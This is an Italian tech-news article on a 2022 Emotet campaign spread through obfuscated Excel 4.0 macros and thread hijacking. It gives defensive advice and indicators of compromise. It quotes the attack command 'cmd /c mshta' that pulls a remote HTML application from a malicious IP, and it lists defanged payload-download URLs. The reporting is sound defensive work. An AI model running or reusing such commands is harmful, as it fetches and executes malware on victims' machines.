Business cyber criminale

Emotet, la nuova variante si diffonde attraverso file Excel dannosi: come difendersi

Una nuova campagna Emotet, che sfrutta ancora attraverso le macro Excel, mette in luce quanto la botnet sia insidiosa e redditizia per il cybercrime. Ecco come proteggersi

Pubblicato il 17 Feb 2022

Mirella Castigli

Giornalista

Malware Emotet

Ritorna Emotet, la botnet complice del cyber crime. I ricercatori di Palo Alto Networks Unit 42 hanno individuato una nuova campagna malspam che diffonde macro Excel infette.

“Emotet è un trojan individuato per la prima volta nel 2014 chiamato anche Heodo. Una volta usato solo come banking trojan, ora viene utilizzato anche come distributore di altri malware o campagne dannose”, spiega Gaetano Scavo, Exprivia Cybersecurity Researcher.

La tecnica di diffusione utilizzata da Emotet

Emotet si diffonde tramite e-mail. “I più importanti sono stati i messaggi di posta elettronica con collegamenti per installare un pacchetto di installazione di Adobe Windows falso”, continua Gaetano Scavo: “Oggi, invece, riappare utilizzando come vettore sempre le e-mail ma cambiando allegato: un file Excel contenete una macro Excel 4.0 offuscata.

Il vettore d’attacco

“La mail di diffusione inviata dalle campagne Emotet”, avverte l’esperto di cybersecurity di Exprivia Cybersecurity Researcher, “contiene un documento Excel che include una macro Excel 4.0 offuscata. Nel momento in cui la vittima apre l’Excel e attiva la macro, essa avvia un cmd.exe per eseguire mshta.exe con un argomento per recuperare ed eseguire un’applicazione HTML remota come ad esempio cmd /cmshta hxxp://91.240.118[.]168/se/s.html. Questa applicazione caricherà ed eseguirà codice PowerShell per connettersi a hxxp://91.240.118[.]168/se/s.png cha sua volta scaricherà un secondo script PowerShell“.

Lo script PowerShell

“Questo script PowerShell contiene diversi URL per scaricare l’installer di Emotet”, sottolinea Gaetano Scavo: “Lo script tenta ogni URL finché un installer Emotet non viene scaricato correttamente. Avere più URL rende questo attacco più resiliente nel caso in cui uno degli URL venga bloccato. Alcuni URL utilizzati a tele scopo sono:

  • hxxp://artanddesign[.]one/wp-content/uploads/A2cZL7/
  • hxxp://strawberry.kids-singer[.]net/assets_c/WAdvNT84Dmu/
  • hxxps: //eleccom[.]negozio:443/servizi/AEjSDj/
  • hxxps://izocab[.]com/nashi-klienty/B5SC/
  • hxxp://unifiedpharma[.]com/wp-content/5arxM/
  • hxxp://hotelamerpalace[.]com/Fox-C404/LEPqPJpt4Gbr8BHAn/
  • hxxps://connecticutsfinestmovers[.]com/Fox-C/mVwOqxT17gVWaE8E/
  • hxxp: //icfacn[.]com/runtime/n7qA2YStudp/
  • hxxps://krezol-group[.]com:443/images/PmLGLKYeCBs5d/
  • hxxp://ledcaopingdeng[.]com/wp-includes/Qq39yj7fpvk/ hxxp:// autodiscover.karlamejia[.]com/wp-admin/hcdnVlRIiwvTVrJjJEE/
  • hxxps://crmweb[.]info:443/bitrix/rc9XjtwF/
  • hxxp://accessunited-bank[.]com/admin/hzIgVwq8btak/
  • hxxp:// pigij[.]com/wp-admin/MVW5/

. Emotet usa le e-mail come vettore per diffondere il file Excel malevolo. Per individuare gli indirizzi mail target a cui inviare il messaggio malevolo utilizza il Thread Hijacking“.

La tecnica del Thread Hijacking

“Con questa tecnica”, spiega Gaetano Scavo, “Emotet invia risposte prestabilite , perciò non reali, sulla base di e-mail valide rubate dai client di posta degli host Windows in precedenza infettati da questo malware. Seguono gli URL utilizzati per il download di Emotet, gli hash degli script utilizzati e l’hash del file Excel. Hash SHA256 file Excel 6d55f25222831cce73fd9a64a8e5a63b002522dc2637bd2704f77168c7c02d88 Dimensione file: 77.989 byte Hash SHA256 scritp PowerShell 1: 9bda03babb0f2c6aa9861eca95b33af06a650e2851cce4edcc1fc3abd8e7c2a1 Dimensione file: 10.986 byte Hash SHA256 script PowerShell 2: 5bd4987db7e6946bf2ca3f73e17d6f75e2d8217df63b2f7763ea9a6ebcaf9fed Dimensione file: 1.353 byte Per verificare l’infezione è consigliato controllare se il malware ha creato nel seguente percorso la DLL di Emotet, il nome del file cambia in base all’URL di download: C :UsersPublicDocumentsssd .[utente]AppDataLocal[caratteri casuali][caratteri casuali].[caratteri casuali] Alcuni di questi file sono: 5c5dfbb6efff270f3d1cc1e6706308aa.dll d61a9a51006f1df934baa9950267ce8b.dll a87ac4f999b220eeb06fb09b461b51dd.dll de00b827303d33ba07f7bee1966a13b8.dll 93183f2e8ade72a42f2c04cbc2609e1b.dll bec841e3d4880dcd6be83b5a97ae1bdc.dll Iy5Crd5QwTA0n9PqwWI.dll LsiF9stTyHHIMH.dll c11771ffadb95e80475ce3ec52dcd8ec.dll”.

Infatti “la tecnica del thread hijacking genera risposte fasulle basate su e-mail legittime rubate da client di posta elettronica di host Windows precedentemente infettati da Emotet”, ha spiegato la Unit 42 nel suo report. “La botnet usa queste dati di posta elettronica trafugati per creare risposte fake impersonando i mittenti originali”.

La nuova campagna Emotet, la botnet più minacciosa

La campagna, attiva dal 21 dicembre scorso e scoperta dai ricercatori di Palo Alto Networks Unit 42, sfrutta macro Excel 4.0 dei documenti per ufficio e layer di offuscamento e tattiche fra cui il dirottamento del thread.

“La nuova campagna scoperta dei ricercatori”, commenta Pierluigi Paganini, analista di cyber security e CEO Cybhorus, “evidenzia lo sforzo continuo degli operatori dietro questa minaccia per renderla più evasiva e versatile“.

Emotet, la botnet da 2,5 miliardi di dollari per il cybercrime.

Quando si attiva la macro, essa scarica ed esegue un’applicazione HTML che a sua volta effettua il download in due fasi di PowerShell per recuperare e generare l’esecuzione finale del payload di Emotet.

Le varie fasi d’attacco usano file di differente tipologia e script offuscati, per cogliere gli utenti alla sprovvista.

“Ricordiamo, infatti, la centralità del ruolo di Emotet nell’ecosistema criminale”, evidenzia Paganini, che fa notare come “molteplici gruppi criminali utilizzano questa botnet per condurre le proprie operazioni. Ancora una volta gli attaccanti sfruttano le potenzialità delle macro presenti all’interno di documenti Office, un vettore di attacco consolidato”. 

Il giro d’affari del cyber crime

Emotet è senza dubbio pericolosa e insidiosa, ma a muovere il mondo cyber crime è purtroppo la leva finanziaria. Parliamo di cifre da capogiro che rendono profittevole condurre operazioni cyber criminali.

“Impressionante anche l’economia dietro una simile minaccia”, conclude Paganini. “Secondo i ricercatori di Check Point, la botnet ha ad oggi infettato fino ad 1,5 milioni di sistemi su scala mondiale generando proventi per 2,5 miliardi di dollari, una cifra impressionante che ci ricorda quanto prolifica e redditizia sia l’industria del cyber crime“.

Come difendersi: disabilitare le macro

Il documento utilizza le macro di Excel. Poiché attori malevoli sfruttano questa funzionalità a frequente rischio di abusi per propagare malware, gli esperti di cyber security consigliano di disabilitarle per bloccare il codice malevolo di default. Infatti, commenta Gaetano Scavo: “Poiché i malintenzionati adoperano le macro di Excel per propagare il malware Emotet, il consiglio è di disabilitare le macro di default, dal sistema operativo, per bloccare il codice malevolo”. E conclude: “Per questo motivo, con la Build 16.0.14427.10000, Microsoft ha disabilitato per default le macro di Excel XML 4.0 con la conseguenza che quando l’utente aprirà un documento (senza aver modificato il default), comparirà nel documento un popup di sicurezza ‘Abilita contenuto’ e solo nel momento in cui l’utente cliccherà sarà avviata la macro malevola”.

Valuta la qualità di questo articolo

La tua opinione è importante per noi!

Speciale PNRR

Tutti
Incentivi
Salute digitale
Formazione
Analisi
Sostenibilità
PA
Sostemibilità
Sicurezza
Digital Economy
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr
CODICE STARTUP
Imprenditoria femminile: come attingere ai fondi per le donne che fanno impresa
DECRETI
PNRR e Fascicolo Sanitario Elettronico: investimenti per oltre 600 milioni
IL DOCUMENTO
Competenze digitali, ecco il nuovo piano operativo nazionale
STRUMENTI
Da Istat e RGS gli indicatori per misurare la sostenibilità nel PNRR
STRATEGIE
PNRR – Piano nazionale di Ripresa e Resilienza: cos’è e novità
FONDI
Pnrr, ok della Ue alla seconda rata da 21 miliardi: focus su 5G e banda ultralarga
GREEN ENERGY
Energia pulita: Banca Sella finanzia i progetti green incentivati dal PNRR
TECNOLOGIA SOLIDALE
Due buone notizie digitali: 500 milioni per gli ITS e l’inizio dell’intranet veloce in scuole e ospedali
INNOVAZIONE
Competenze digitali e InPA cruciali per raggiungere gli obiettivi del Pnrr
STRATEGIE
PA digitale 2026, come gestire i fondi PNRR in 5 fasi: ecco la proposta
ANALISI
Value-based healthcare: le esperienze in Italia e il ruolo del PNRR
Strategie
Accordi per l’innovazione, per le imprese altri 250 milioni
Strategie
PNRR, opportunità e sfide per le smart city
Strategie
Brevetti, il Mise mette sul piatto 8,5 milioni
Strategie
PNRR e opere pubbliche, la grande sfida per i Comuni e perché bisogna pensare digitale
Formazione
Trasferimento tecnologico, il Mise mette sul piatto 7,5 milioni
Strategie
PSN e Strategia Cloud Italia: a che punto siamo e come supportare la PA in questo percorso
Dispersione idrica
Siccità: AI e analisi dei dati possono ridurre gli sprechi d’acqua. Ecco gli interventi necessari
PNRR
Cloud, firmato il contratto per l’avvio di lavori del Polo strategico
Formazione
Competenze digitali, stanziati 48 milioni per gli Istituti tecnologici superiori
Iniziative
Digitalizzazione delle reti idriche: oltre 600 milioni per 21 progetti
Competenze e competitività
PNRR, così i fondi UE possono rilanciare la ricerca e l’Università
Finanziamenti
PNRR, si sbloccano i fondi per l’agrisolare
Sanità post-pandemica
PNRR, Missione Salute: a che punto siamo e cosa resta da fare
Strategie
Sovranità e autonomia tecnologica nazionale: come avviare un processo virtuoso e sostenibile
La relazione
Pnrr e PA digitale, l’alert della Corte dei conti su execution e capacità di spesa
L'editoriale
Elezioni 2022, la sfida digitale ai margini del dibattito politico
Strategie
Digitale, il monito di I-Com: “Senza riforme Pnrr inefficace”
Transizione digitale
Pnrr: arrivano 321 milioni per cloud dei Comuni, spazio e mobilità innovativa
L'analisi I-COM
Il PNRR alla prova delle elezioni: come usare bene le risorse e centrare gli obiettivi digitali
Cineca
Quantum computing, una svolta per la ricerca: lo scenario europeo e i progetti in corso
L'indice europeo
Desi, l’Italia scala due posizioni grazie a fibra e 5G. Ma è (ancora) allarme competenze
L'approfondimento
PNRR 2, ecco tutte le misure per cittadini e imprese: portale sommerso, codice crisi d’impresa e sismabonus, cosa cambia
Servizi digitali
PNRR e trasformazione digitale: ecco gli investimenti e le riforme previste per la digitalizzazione della PA
Legal health
Lo spazio europeo dei dati sanitari: come circoleranno le informazioni sulla salute nell’Unione Europea
Servizi digitali
PNRR e PA digitale: non dimentichiamo la dematerializzazione
Digital Healthcare transformation
La trasformazione digitale degli ospedali
Governance digitale
PA digitale, è la volta buona? Così misure e risorse del PNRR possono fare la differenza
Servizi digitali
Comuni e digitale, come usare il PNRR senza sbagliare
La survey
Pnrr e digitale accoppiata vincente per il 70% delle pmi italiane
Missione salute
Fascicolo Sanitario Elettronico alla prova del PNRR: limiti, rischi e opportunità
Servizi pubblici
PNRR: come diventeranno i siti dei comuni italiani grazie alle nuove risorse
Skill gap
PNRR, la banda ultra larga crea 20.000 nuovi posti di lavoro
Il Piano
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUMPA2022
PNRR e trasformazione digitale: rivedi i Talk di FORUM PA 2022 in collaborazione con le aziende partner
I contratti
Avio, 340 milioni dal Pnrr per i nuovi propulsori a metano
Next Generation EU
PNRR, a che punto siamo e cosa possono aspettarsi le aziende private
Fondi
Operativo il nuovo portale del MISE con tutti i finanziamenti per le imprese
Servizi comunali
Il PNRR occasione unica per i Comuni digitali: strumenti e risorse per enti e cittadini
Healthcare data platform
PNRR dalla teoria alla pratica: tecnologie e soluzioni per l’innovazione in Sanità
Skill
Competenze digitali, partono le Reti di facilitazione
Gli obiettivi
Scuola 4.0, PNRR ultima chance: ecco come cambierà il sistema formativo
Sistema Paese
PNRR 2, è il turno della space economy
FORUM PA 2022
FORUM PA 2022: la maturità digitale dei comuni italiani rispetto al PNRR
Analisi
PNRR: dalla Ricerca all’impresa, una sfida da cogliere insieme
Innovazione
Pnrr, il Dipartimento per la Trasformazione digitale si riorganizza
FORUM PA 2022
PA verde e sostenibile: il ruolo di PNRR, PNIEC, energy management e green public procurement
Analisi
PNRR, Comuni e digitalizzazione: tutto su fondi e opportunità, in meno di 3 minuti. Guarda il video!
Rapporti
Competenze digitali e servizi automatizzati pilastri del piano Inps
Analisi
Attuazione del PNRR: il dialogo necessario tra istituzioni e società civile. Rivedi lo Scenario di FORUM PA 2022
Progetti
Pnrr, fondi per il Politecnico di Torino. Fra i progetti anche IS4Aerospace
Analisi
PNRR, Colao fa il punto sulla transizione digitale dell’Italia: «In linea con tutte le scadenze»
La Svolta
Ict, Istat “riclassifica” i professionisti. Via anche al catalogo dati sul Pnrr
Analisi
Spazio, Colao fa il punto sul Pnrr: i progetti verso la milestone 2023
FORUM PA 2022
Ecosistema territoriale sostenibile: l’Emilia Romagna tra FESR e PNRR
Il Piano
Innovazione, il Mise “centra” gli obiettivi Pnrr: attivati 17,5 miliardi
Analisi
PNRR: raggiunti gli obiettivi per il primo semestre 2022. Il punto e qualche riflessione
Analisi
PNRR: dal dialogo tra PA e società civile passa il corretto monitoraggio dei risultati, tra collaborazione e identità dei luoghi
Webinar
Comuni e PNRR: un focus sui bandi attivi o in pubblicazione
Analisi
Formazione 4.0: cos’è e come funziona il credito d’imposta
PA e Sicurezza
PA e sicurezza informatica: il ruolo dei territori di fronte alle sfide della digitalizzazione
PA e sicurezza
PNRR e servizi pubblici digitali: sfide e opportunità per Comuni e Città metropolitane
Water management
Water management in Italia: verso una transizione “smart” e “circular” 
LE RISORSE
Transizione digitale, Simest apre i fondi Pnrr alle medie imprese
Prospettive
Turismo, cultura e digital: come spendere bene le risorse del PNRR
Analisi
Smart City: quale contributo alla transizione ecologica
Decarbonizzazione
Idrogeno verde, 450 milioni € di investimenti PNRR, Cingolani firma
Unioncamere
PNRR, imprese in ritardo: ecco come le Camere di commercio possono aiutare
I fondi
Industria 4.0: solo un’impresa su tre pronta a salire sul treno Pnrr

Articoli correlati